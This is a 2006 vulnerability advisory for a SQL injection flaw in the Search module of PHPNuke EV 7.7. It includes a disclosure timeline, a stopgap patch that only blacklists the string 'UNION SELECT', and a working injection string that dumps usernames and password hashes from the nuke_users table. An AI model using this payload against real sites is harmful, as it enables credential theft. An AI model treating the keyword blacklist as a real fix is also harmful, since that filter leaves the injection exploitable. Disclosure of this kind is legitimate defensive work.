###############################################
PHPNuke EV 7.7 'search' module 'query' variable SQL injection
Vendor url: http://nukevolution.com/
exploit available: yes
vendor notify: yes
advisory: http://lostmon.blogspot.com/2006/01/phpnuke-ev-77-search-module-query.html
################################################

PHPNuke EV 7.7 has a flaw which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to the "query" parameter when performing a search isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

#################
versions:
################

PHPNuke EV 7.7 -R1
Prior versions are possibly affected.

##################
solution:
###################

No solution at this time!!!

A possible fix:

Open the file modules/Search/index.php and, after this code:

------------------------------------
require_once("mainfile.php");
$instory = '';
$module_name = basename(dirname(__FILE__));
get_lang($module_name);
----------------------------------------------

you can add this:

------------------------------------
// Stop the request if the search term contains UNION SELECT
// (eregi() matches case-insensitively).
if(eregi("UNION SELECT",$query) || eregi("UNION%20SELECT",$query)){
    die();
}
----------------------------------------------

This is a "simple fix": it only detects the UNION SELECT command and dies if it is in the query variable. You can write the same code for UNION ALL SELECT or other variants of the exploit.

####################
Timeline
####################

discovered: 21-11-2005
vendor notify: 29-12-2005 (forums)
vendor response: -------
vendor fix: -----
disclosure: 09-01-2006

###################
example:
###################

Go to http://[Victim]/modules.php?name=Search and write this proof in the search box:

s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*

All users' hashes are available to view.
#################### €nd ########################

Thanks to estrella for being my light

--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what makes the mind move....